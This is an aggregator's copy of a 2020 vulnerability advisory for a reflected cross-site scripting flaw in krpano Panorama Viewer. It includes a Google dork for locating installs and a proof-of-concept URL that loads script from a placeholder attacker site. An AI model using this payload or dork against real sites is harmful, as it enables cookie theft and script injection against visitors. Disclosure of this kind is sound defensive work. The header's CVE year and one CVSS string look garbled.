Krpano Panorama Viewer 1.20.8 Cross Site Scripting

CVE	Category	Price	Severity
CVE-2021-18691	CWE-79	$500	High

Author	Risk	Exploitation Type	Date
Unknown	High	Remote	2020-10-06

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020100033

Below is a copy:

Krpano Panorama Viewer 1.20.8 Cross Site Scripting

# Exploit Title: XSS in krpano Panorama Viewer
# Google Dork: inurl:krpano.html
# Date: 10/05/2020
# Exploit Author: Adriano Marcio Monteiro (@adrianomarcmont)
# Exploit Author Site: https://www.brztec.com
# Exploit Author E-mail: [email protected]
# Exploit Author Packetstorm Bio:
https://packetstormsecurity.com/files/author/11063/
# Vendor Homepage: https://krpano.com/
# Software Link: https://krpano.com/download/
# Version: <=1.20.8
# Tested on: All
# CVE : Requested
# CVSS Severity: Medium
# CVSS Score: 6.1
# CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
# CVSS Link:
https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

# Disclosure Policy: 90-day deadline has expired and no response from the
vendor.

*XSS in **krpano Panorama Viewer *
CVSS Severity: *Medium*
CVSS Score: *6.1*
CVSS Vector:
CVSS:3.0/AV:N/AC:L/PRCVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N:N/UI:R/S:C/C:L/I:L/A:N
<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N>

*Description*
krpano Panorama Viewer <=1.20.8 is vulnerable to a Reflected Cross-Site
Scripting (XSS) vulnerability caused by improper validation of user
supplied input when loading remote js and XML files in the default
installation (krpano.html).

*Impact*
A remote attacker could exploit this vulnerability using a specially
crafted URL to execute a script in a victim's Web browser within the
security context of the hosting Web site, once the URL is clicked or
visited. An attacker could use this vulnerability to steal the victim's
cookie-based authentication credentials, force malware execution, user
redirection and others.

*Steps to Reproduce*
Exploit example, from documentation tutorials:
http://VICTIM_SITE/krpano.html?html5=only&preview.type=grid()&plugin[test].url=https://ATTACKER_SITE/labs/krpano/krpano.js&plugin[test].align=center&plugin[test].onclick=dosomething(hello,plugin)&onstart=showlog();

*Fix*
Block remote load of js and XML files. Contact the vendor.

*References*
CWE-79: Improper Neutralization of Input During Web Page Generation
('Cross-site Scripting')
https://cwe.mitre.org/data/definitions/79.html


Best Regards./Atenciosamente.

*Adriano Mrcio Monteiro*
Offensive Security Specialist
[email protected]
+55 31 99255-3329 <+55+31+99255-3329>


https://www.brztec.com  <https://www.brztec.com/>
*Saiba das suas fraquezas antes do hackers.*
*Know your weaknesses before hackers.*
Pentests, Social Engineering, Training and Recruitment.
*BRASIL *[email protected]  +55 31 4042-7029 <+55+31+4042-7029>
*U.S.A.    *[email protected]  +1 480 404-7029 <+1+480+404-7029>

-- 




Esta mensagem pode conter informao confidencial ou privilegiada de 
propriedade da BRZTEC Informtica, sendo seu sigilo protegido por lei. Se 
voc no for o destinatrio ou a pessoa autorizada a receber esta mensagem, 
no pode usar, copiar ou divulgar as informaes nela contidas ou tomar 
qualquer ao baseada nessas informaes. Se voc recebeu esta mensagem por 
engano, por favor, avise imediatamente ao remetente, respondendo o e-mail e 
em seguida apague-a. Agradecemos sua cooperao.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum